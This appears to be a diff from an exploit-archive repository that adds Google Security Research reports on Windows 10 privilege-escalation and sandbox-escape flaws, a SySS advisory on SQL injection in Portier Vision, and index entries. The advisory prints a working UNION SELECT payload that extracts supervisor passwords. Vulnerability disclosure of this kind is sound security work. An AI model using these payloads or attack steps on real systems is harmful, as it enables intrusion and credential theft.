The Data Sharing Service MoveFileInheritSecurity method is broken leading to EoP.
Description:
The PolicyChecker::MoveFileInheritSecurity method is almost an exact copy of the code from the Storage Service which I exploited in MSRC cases 42121 and 42122. In fact Id say its the same code copy and pasted. It has the exactly same bugs as the storage service version, specifically arbitrary file writes, due to the reverting call to MoveFileEx and arbitrary ACL setting by placing a hardlinked file in a directory with inheritable ACEs.
This method is called from DSSMoveToSharedFile and DSSMoveFromSharedFile. While those methods do some checking its still possible to bypass the checks. This results in the MoveFileInheritSecurity method being called as the SYSTEM user which results in EoP.
Im saddened by the fact this wasnt discovered during variant analysis from the Storage Service issues.
Proof of Concept:
Ive provided a PoC as a C# project. It calls DSMoveFromSharedFile to modify the DACL of a hardlink arbitrary file granted write access to the user.
1) Compile the C# project. Itll need to pull NtApiDotNet from NuGet to build.
2) Execute the PoC passing the path to a file the user cant write on the command line (but can be written by SYSTEM).
Expected Result:
The call to move the file.
Observed Result:
The call to move file succeeds and the arbitrary file is now ACLS with the Everyone group for full access.
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46160.zip

50
exploits/windows/local/46161.txt Normal file
View file

@ -0,0 +1,50 @@
Windows: Browser Broker Cross Session EoP
Platform: Windows 10 1803 (not tested anything else).
Class: Elevation of Privilege
Security Boundary (per Windows Security Service Criteria): Session Boundary
Summary:
The Browser Broker COM object doesnt verify its caller correctly allowing one user to execute arbitrary code in another logged on users session.
Description:
The Browser Broker Class (CLSID: 0002df02-0000-0000-c000-000000000046) is closely tied with Microsoft Edge and is used to perform certain privileged operations that the main browser process running in an App Container cannot do. The majority of the calls are checked with functions such as BrokerAuthenticateAttachedCallerGetPIC which ensures the caller is an Edge process (based on its package ID) and meets certain requirements based on the sandbox type etc. One thing this code doesnt do is check that the caller is the same user as the running broker process.
As the user is not checked this means its only the COM security which prevents you instantiating this in another running session on the same machine. The COM users allowed to launch the broker are:
* Everyone
* microsoft.microsoftedge_8wekyb3d8bbwe (package SID)
This means that everyone is allowed to start the broker COM process even in another session. However perhaps the access permissions will save us:
* NT AUTHORITY\Authenticated Users
* BUILTIN\Guests
* microsoft.microsoftedge_8wekyb3d8bbwe (package SID)
* NAMED CAPABILITIES\Lpac Web Platform
Even Guests can access the COM object after creating it (Ive no idea why of all things). Basically though these sets of permissions ensure that one user can create and call methods on the broker in another session. The only requirement is you need to impersonate the Microsoft Edge token when calling methods, but thats easy to get just by stealing the token from a running Edge process.
Once youve got access to the broker COM server its pretty easy to exploit to get arbitrary code execution. You can modify files through the IFileOperationBroker or just call ShellExecute using IDownloadExecutionBroker.
Ultimately I warned you after cases 36544 and 37954 that you should be fixing the root cause of normal users being able to use the Session Moniker not playing whack-a-mole with COM objects. Of course you didnt listen then and no doubt youll just try and fix browser broker and be done with it.
This issue also demonstrates that the Browser Broker is an easy sandbox escape if you can get into the MicrosoftEdge process, which doesnt seem a good thing IMO. While LPAC certainly makes it harder to elevate to the main browser process Id not be confident of it being a complete security boundary.
Proof of Concept:
Ive provided a PoC as a C++ project. It will steal the access token from a running copy of Edge then restart itself in another logged on session.
1) Compile the C++ project.
2) Ensure theres two users logged on to the same system.
3) Start Edge in the session youll run the PoC from.
4) Run the PoC.
Expected Result:
Create a broker and accessing it in another session should fail.
Observed Result:
The PoC is running in another users session.
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46161.zip

66
exploits/windows/local/46162.txt Normal file
View file

@ -0,0 +1,66 @@
Windows: COM Desktop Broker Elevation of Privilege
Platform: Windows 10 1809 (almost certainly earlier versions as well).
Class: Elevation of Privilege
Security Boundary (per Windows Security Service Criteria): AppContainer Sandbox
Summary:
The COM Desktop Broker doesnt correctly check permissions resulting in elevation of privilege and sandbox escape.
Description:
Windows 10 introduced “Brokered Windows Runtime Components for side-loaded applications” which allows a UWP application to interact with privileged components by allowing developers to write a custom broker in .NET. Rather than handling this with the existing Runtime Broker a new “Desktop Broker” was created and plumbed into the COM infrastructure. This required changes in COMBASE to instantiate the broker class and RPCSS to control access to the broker.
The stated purpose is only for use by sideloaded enterprise applications, specifically .NET based ones. Looking at the checks in RPCSS for the activation of the broker we can see the check as follows:
HRESULT IsSideLoadedPackage(LPCWSTR *package_name, bool *is_sideloaded) {
PackageOrigin origin;
*is_sideloaded = false;
HRESULT hr = GetStagedPackageOrigin(package_name, &origin);
if (FAILED(hr))
return hr;
*is_sideloaded = origin != PackageOrigin_Store;
return S_OK;
}
This check is interesting because it considered anything to be sideloaded that hasnt come from the Store. Looking at the PackageOrigin enumeration this includes Inbox applications such as Cortana and Edge both of which process potentially untrusted content from the network. Of course this isnt an issue if the broker is secure, but…
For a start, as long as RPCSS thinks the current package is side-loaded this feature doesnt require any further capability to use, or at least nothing checks for one during the process. Even in the side loading case this isnt ideal, it means that even though a side loaded application is in the sandbox this would allow the application to escape without giving the installer of the application any notice that it has effectively full trust. Contrast this with Desktop Bridge UWP applications which require the “fullTrust” capability to invoke a Win32 application outside the sandbox. This is even more important for a sandbox escape from an Inbox application as you cant change the capabilities at all without having privileged access. Now, technically youre supposed to have the appropriate configuration inside the applications manifest to use this, but that only applies if youre activating through standard COM Runtime activation routes, instead you can just create an instance of the brokers class (which is stored in the registry, but at least seems to always be C8FFC414-946D-4E61-A302-9B9713F84448). This class is running in a DLL surrogate at normal user privileges. Therefore any issue with this interface is a sandbox escape. The call implements a single interface, IWinRTDesktopBroker, which looks like:
class IWinRTDesktopBroker : public IUnknown {
HRESULT GetClassActivatorForApplication(HSTRING dir, IWinRTClassActivator** ppv);
};
This interface has only one method, GetClassActivatorForApplication which takes the path to the brokered components directory. No verification of this directory takes place, it can be anywhere you specify. Id have assumed it might have at least been limited to a special subdirectory of the package installation, but Id clearly be wrong. Passing an arbitrary directory to this method, you get back the following interface:
class IWinRTClassActivator : public IUnknown {
HRESULT ActivateInstance(HSTRING activatableClassId, IInspectable** ppv);
HRESULT GetActivationFactory(HSTRING activatableClassId, REFIID riid, IUnknown** ppv);
};
So to escape the sandbox with this you can create directory somewhere, copy in a WinRT component winmd file then activate it. The activation process will run class constructors and give you arbitrary code execution outside the sandbox.
However, even if the directory was checked in some way as long as you can get back the IWinRTClassActivator interface you could still escape the sandbox as the object is actually an instance of the System.Runtime.InteropServices.WindowsRuntime.WinRTClassActivator class which is implemented by the .NET BCL. This means that it exposes a managed DCOM object to a low-privileged caller which is pretty simple to exploit using my old serialization attacks (e.g. MSRC case 37122). The funny thing is MSRC wrote a blog post [1] about not using Managed DCOM across security boundaries almost certainly before this code was implemented but clearly it wasnt understood.
[1] https://blogs.technet.microsoft.com/srd/2014/10/14/more-details-about-cve-2014-4073-elevation-of-privilege-vulnerability/
There are some caveats, as far as I can tell you cant create this broker from an LPAC Edge content process, more because the connection to the broker fails rather than any activation permissions check. Therefore to exploit from Edge youd need to get into the MicrosoftEdge process (or another process outside of LPAC). This is left as an exercise for the reader.
Fixing wise, Id guess unless youre actually using this for Inbox applications at a minimum you probably should only Developer and LOB origins. Ideally youd probably want to require a capability for its use but the horse may have bolted on that one. Anyway you might not consider this an issue as it cant easily be used from LPAC and side-loading is an issue unto itself.
Proof of Concept:
Ive provided a PoC as a solution containing the C# PoC and Brokered Component as well as a DLL which can be injected into Edge to demonstrate the issue. The PoC will inject the DLL into a running MicrosoftEdge process and run the attack. Note that the PoC needs to know the relative location of the ntdll!LdrpKnownDllDirectoryHandle symbol for x64 in order to work. It should be set up for the initial release of RS5 (17763.1) but if you need to run it on another machine youll need to modify GetHandleAddress in the PoC to check the version string from NTDLL and return the appropriate location (you can get the offset in WinDBG using ? ntdll!LdrpKnownDllDirectoryHandle-ntdll). Also before you ask, the injection isnt a CIG bypass you need to be able to create an image section from an arbitrary file to perform the injection which you can do inside a process running with CIG.
1) Compile the solution in “Release” mode for “Any CPU”. Itll need to pull NtApiDotNet from NuGet to build.
2) Start a copy of Edge.
3) Execute the PoC from the x64\Release directory.
Expected Result:
Creating the broker fails.
Observed Result:
The broker creation succeeds and notepad executes outside the sandbox.
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46162.zip

174
exploits/windows/webapps/46163.txt Normal file
View file

@ -0,0 +1,174 @@
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Advisory ID: SYSS-2018-012
Product: PORTIER
Affected Version(s): 4.4.4.2, 4.4.4.6
Tested Version(s): 4.4.4.2, 4.4.4.6
Vulnerability Type: SQL Injection (CWE-89)
Risk Level: HIGH
Solution Status: Open
Manufacturer Notification: 2018-06-13
Solution Date: -
Public Disclosure: 2018-01-09
CVE Reference: CVE-2019-5722
Author of Advisory: Christian Pappas, SySS GmbH
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Overview:
portier vision is a rich client application for managing door keys allocated
to certain persons or group of persons.
The manufacturer describes the product as follows (see [1]):
"portierA(r) vision
* manages locking systems and access rights in a modern and efficient manner
* stores all the details for every single key
* provides you lightning fast with all the information you need in a format
you choose
portier A(r)vision easy - secure - fast, our idea of software."
Due to a lack of user input validation in the parameter handling, portier is
application wide vulnerable to various SQL injections, including the login
form.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerability Details:
Many input fields are vulnerable to SQL injection. An SQL injection allows
typically an attacker to execute almost arbitrary SQL commands. It is possible
to break out of the original query with an uptick, append a custom query and
fix the syntax.
The application supports Firebird and MS SQL database servers. Stacked queries
do not work with both database servers. One of the vulnerable input fields is
the user name within the login form. This allows even unauthenticated users
to exploit the application. Because the authentication process is implemented
in the client application, the SQL injection in the login form does not allow
a login bypass.
The most promising real-life attack among other possible attacks is to steal
the encrypted passwords of users with supervisor privileges. Within this
application Supervisors have the highest privileges for administrative purpose.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Proof-of-Concept (PoC):
This proof-of-concept will exploit the vulnerability in the search form for a
key ring number, but several other vulnerable input fields do exist. Because
this is not a web application, most of the publicly available tools for
exploiting SQL injections will not work out of the box.
Due to the use of plain text communication between application and database,
server it is easy to sniff the traffic and capture the queries made by the
application. That comes in handy for building a valid attack vector since the
flaw is exploited manually.
Searching for the key ring number 'TRACKME', the application queries the
database server as following:
SELECT
BUND.BUND_ID, BUND.BUNDNUMMER, BUND.BESCHREIBUNG, BUND.ABTEILUNG, BUND.BEREICH, BUND.KOSTENSTELLE, DEPOT.BEZEICHNUNG as DEP_BEZEICHNUNG, BUND.BEMERKUNG_1, BUND.BEMERKUNG_2, BUND.BEMERKUNG_3
FROM
BUND BUND
LEFT OUTER JOIN DEPOT DEPOT ON DEPOT.DEPOT_ID = BUND.DEPOT_ID
WHERE
( 1 = 1 )
AND (upper(BUND.BUNDNUMMER) LIKE 'TRACKME%')
To get hold of the passwords for all supervisor users in the application, it is
necessary to break out of the the original, inject the attack vector, and
finally fix the SQL syntax:
') UNION SELECT 1,user_kz,passwort,1,1,1,1,1,1,1 FROM BENUTZER WHERE (systemuser = 1) AND ('a%' = 'a
'systemuser' within the previous shown attack vector can be replaced by '1' to
get the passwords of all users, no matter if they have supervisor privileges
or not. In both cases, the username will be displayed in the application next
to their password.
The attack vector embedded in the client's query looks like the following:
SELECT
BUND.BUND_ID, BUND.BUNDNUMMER, BUND.BESCHREIBUNG, BUND.ABTEILUNG, BUND.BEREICH, BUND.KOSTENSTELLE, DEPOT.BEZEICHNUNG as DEP_BEZEICHNUNG, BUND.BEMERKUNG_1, BUND.BEMERKUNG_2, BUND.BEMERKUNG_3
FROM
BUND BUND
LEFT OUTER JOIN DEPOT DEPOT ON DEPOT.DEPOT_ID = BUND.DEPOT_ID
WHERE
( 1 = 1 )
AND (upper(BUND.BUNDNUMMER) LIKE '') UNION SELECT 1,user_kz,passwort,1,1,1,1,1,1,1 FROM BENUTZER WHERE (systemuser = 1) AND ('a%' = 'a%')
The Firebird, unlike the MS SQL, database do not support UNION SELECT query if
the entire query is terminated by an ORDER BY statement. Thus the number of
out of the application exploitable input fields is with an MS SQL database
slightly smaller.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Solution:
Make application wide use of prepared statements for querying the database.
SySS GmbH is not aware of a solution to the reported security issue provided
by the manufacturer.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Disclosure Timeline:
2018-05-23: Vulnerability discovered
2018-06-13: Vulnerability reported to manufacturer
2018-01-09: Public disclosure of vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
References:
[1] Product website for PORTIER
https://portier.de/
[2] SySS Security Advisory SYSS-2018-012
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2018-012.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/news/responsible-disclosure-policy/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Credits:
This security vulnerability was found by Christian Pappas of SySS GmbH.
E-Mail: christian.pappas@syss.de
Public Key: ://www.syss.de/fileadmin/dokumente/PGPKeys/Christian_Pappas.asc
Key ID: 0xC5D4E3BA8BA76B25
Key Fingerprint: 5655 FDBE 40DF 0CC4 F143 9877 C5D4 E3BA 8BA7 6B25
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Disclaimer:
The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS web
site.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Copyright:
Creative Commons - Attribution (by) - Version 3.0
URL: https://creativecommons.org/licenses/by/3.0/deed.en
-----BEGIN PGP SIGNATURE-----
iQEzBAEBCgAdFiEEVlX9vkDfDMTxQ5h3xdTjuounayUFAlw18coACgkQxdTjuoun
ayX3Ugf/QMDATk/V34U/l66+qn8zHwjL+aNq/+WlTVikCn6I3R2uU6LzXDvgmgiF
qJEVn/4McQkdHuV4trSaJp0oz0RG/aQbQQp289tbn41xIdhdWNI2Gj2qhDdqUqtG
bJYIIZ8e2TjQU33J3OJfo68eOprWyq+UJg8abgwiLuUMxlFESeSnwwkxvqSToiPl
TIg/A87exJjtpbwM7OSwxfUhr4/VGSv8UTp3v6a+9fiA2G1HBMmT3zOuy882V2QP
D1gr6/lB9J7gTiGLgB1fWtL0BtmBTivtOylc/FVnKiqSzt7v2MwoBzLEc3HsA2mY
rAIgS1s9cBfoPIkvRHzV8WHyr+CyAA==
=q3CM
-----END PGP SIGNATURE-----

32
files_exploits.csv
View file

@ -10204,6 +10204,15 @@ id,file,description,date,author,type,platform,port
46104,exploits/windows/local/46104.txt,"Microsoft Windows - DSSVC CheckFilePermission Arbitrary File Deletion",2019-01-09,"Google Security Research",local,windows,
46107,exploits/windows/local/46107.py,"RGui 3.5.0 - Local Buffer Overflow (SEH)(DEP Bypass)",2019-01-10,bzyo,local,windows,
46120,exploits/windows/local/46120.py,"Code Blocks 17.12 - Local Buffer Overflow (SEH) (Unicode)",2019-01-11,bzyo,local,windows,
46142,exploits/solaris/local/46142.sh,"xorg-x11-server < 1.20.3 - Local Privilege Escalation (Solaris 11 inittab)",2019-01-14,"Marco Ivaldi",local,solaris,
46155,exploits/windows/local/46155.c,"Dokany 1.2.0.1000 - Stack-Based Buffer Overflow Privilege Escalation",2019-01-14,"Parvez Anwar",local,windows,
46156,exploits/windows/local/46156.txt,"Microsoft Windows 10 - SSPI Network Authentication Session 0 Privilege Escalation",2019-01-14,"Google Security Research",local,windows,
46157,exploits/windows/local/46157.txt,"Microsoft Windows 10 - DSSVC DSOpenSharedFile Arbitrary File Open Privilege Escalation",2019-01-14,"Google Security Research",local,windows,
46158,exploits/windows/local/46158.txt,"Microsoft Windows 10 - DSSVC DSOpenSharedFile Arbitrary File Delete Privilege Escalation",2019-01-14,"Google Security Research",local,windows,
46159,exploits/windows/local/46159.txt,"Microsoft Windows 10 - DSSVC CanonicalAndValidateFilePath Security Feature Bypass",2019-01-14,"Google Security Research",local,windows,
46160,exploits/windows/local/46160.txt,"Microsoft Windows 10 - DSSVC MoveFileInheritSecurity Privilege Escalation",2019-01-14,"Google Security Research",local,windows,
46161,exploits/windows/local/46161.txt,"Microsoft Windows 10 - Browser Broker Cross Session Privilege Escalation",2019-01-14,"Google Security Research",local,windows,
46162,exploits/windows/local/46162.txt,"Microsoft Windows 10 - COM Desktop Broker Privilege Escalation",2019-01-14,"Google Security Research",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -17072,6 +17081,7 @@ id,file,description,date,author,type,platform,port
46073,exploits/linux/remote/46073.rb,"Hashicorp Consul - Remote Command Execution via Rexec (Metasploit)",2019-01-02,Metasploit,remote,linux,
46074,exploits/linux/remote/46074.rb,"Hashicorp Consul - Remote Command Execution via Services API (Metasploit)",2019-01-02,Metasploit,remote,linux,
46075,exploits/python/remote/46075.rb,"Mailcleaner - Authenticated Remote Code Execution (Metasploit)",2019-01-07,"Mehmet Ince",remote,python,443
46143,exploits/hardware/remote/46143.rb,"Hootoo HT-05 - Remote Code Execution (Metasploit)",2019-01-14,"Andrei Manole",remote,hardware,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -40612,3 +40622,25 @@ id,file,description,date,author,type,platform,port
46119,exploits/php/webapps/46119.txt,"Adapt Inventory Management System 1.0 - SQL Injection",2019-01-11,"Ihsan Sencan",webapps,php,80
46121,exploits/php/webapps/46121.txt,"Joomla! Component JoomProject 1.1.3.2 - Information Disclosure",2019-01-11,"Ihsan Sencan",webapps,php,80
46122,exploits/php/webapps/46122.txt,"Joomla! Component JoomCRM 1.1.1 - SQL Injection",2019-01-11,"Ihsan Sencan",webapps,php,80
46132,exploits/hardware/webapps/46132.txt,"Across DR-810 ROM-0 - Backup File Disclosure",2019-01-14,SajjadBnd,webapps,hardware,80
46133,exploits/php/webapps/46133.txt,"i-doit CMDB 1.12 - Arbitrary File Download",2019-01-14,"Ihsan Sencan",webapps,php,80
46134,exploits/php/webapps/46134.txt,"i-doit CMDB 1.12 - SQL Injection",2019-01-14,"Ihsan Sencan",webapps,php,80
46136,exploits/php/webapps/46136.py,"Horde Imp - 'imap_open' Remote Command Execution",2019-01-14,"Paolo Serracino_ Pietro Minniti_ Damiano Proietti",webapps,php,
46137,exploits/php/webapps/46137.txt,"Modern POS 1.3 - Arbitrary File Download",2019-01-14,"Ihsan Sencan",webapps,php,80
46138,exploits/php/webapps/46138.txt,"Modern POS 1.3 - SQL Injection",2019-01-14,"Ihsan Sencan",webapps,php,80
46139,exploits/php/webapps/46139.txt,"Twilio WEB To Fax Machine System Application 1.0 - SQL Injection",2019-01-14,"Ihsan Sencan",webapps,php,80
46140,exploits/php/webapps/46140.txt,"Live Call Support Widget 1.5 - Cross-Site Request Forgery (Add Admin)",2019-01-14,"Ihsan Sencan",webapps,php,80
46141,exploits/php/webapps/46141.txt,"Live Call Support Widget 1.5 - Remote Code Execution / SQL Injection",2019-01-14,"Ihsan Sencan",webapps,php,
46144,exploits/php/webapps/46144.txt,"Craigs Classified Ads CMS Theme 1.0.2 - SQL Injection",2019-01-14,"Ihsan Sencan",webapps,php,80
46145,exploits/php/webapps/46145.txt,"Find a Place CMS Directory 1.5 - SQL Injection",2019-01-14,"Ihsan Sencan",webapps,php,80
46146,exploits/php/webapps/46146.txt,"Cleanto 5.0 - SQL Injection",2019-01-14,"Ihsan Sencan",webapps,php,80
46147,exploits/hardware/webapps/46147.py,"Lenovo R2105 - Cross-Site Request Forgery (Command Execution)",2019-01-14,"Nathu Nandwani",webapps,hardware,80
46148,exploits/php/webapps/46148.txt,"HealthNode Hospital Management System 1.0 - SQL Injection",2019-01-14,"Ihsan Sencan",webapps,php,80
46149,exploits/php/webapps/46149.html,"Hucart CMS 5.7.4 - Cross-Site Request Forgery (Add Administrator Account)",2019-01-14,AllenChen,webapps,php,
46150,exploits/php/webapps/46150.txt,"ThinkPHP 5.X - Remote Command Execution",2019-01-14,vr_system,webapps,php,80
46151,exploits/php/webapps/46151.txt,"Real Estate Custom Script 2.0 - SQL Injection",2019-01-14,"Ihsan Sencan",webapps,php,80
46152,exploits/php/webapps/46152.txt,"Job Portal Platform 1.0 - SQL Injection",2019-01-14,"Ihsan Sencan",webapps,php,80
46153,exploits/aspx/webapps/46153.py,"Umbraco CMS 7.12.4 - Authenticated Remote Code Execution",2019-01-14,"Gregory Draperi",webapps,aspx,
46154,exploits/php/webapps/46154.txt,"Bigcart - Ecommerce Multivendor System 1.0 - SQL Injection",2019-01-14,"Ihsan Sencan",webapps,php,80
46163,exploits/windows/webapps/46163.txt,"Portier Vision 4.4.4.2 / 4.4.4.6 - SQL Injection",2019-01-14,"SySS GmbH",webapps,windows,
46164,exploits/cgi/webapps/46164.txt,"AudioCode 400HD - Command Injection",2019-01-14,Sysdream,webapps,cgi,

Can't render this file because it is too large.